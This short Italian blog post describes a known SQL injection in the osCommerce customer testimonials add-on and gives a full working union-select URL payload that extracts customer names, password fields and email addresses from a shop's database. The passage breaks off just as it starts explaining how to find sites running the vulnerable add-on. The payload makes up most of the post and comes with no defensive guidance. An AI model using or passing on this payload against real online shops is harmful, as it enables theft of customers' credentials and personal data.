weBlog
archivio
osCommerce customers testimonials Sql injection
Di solito non segnalo bug già noti. Ma osCommerce è un CMS di vendita online ed un SQL inject su questo CMS permette di accedere ai dati degli utenti registrati su un determinato sito. La segnalazione del bug è su milw0rm
L’exploit consiste nell’iniettare una query sql tramite $_GET
http://www.vuln.oscommerce.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0×3a,customers_password,0×3a,customers_email_address),4,5,6,7,8+from+customers/*
Per trovare siti con installato l’addon […]
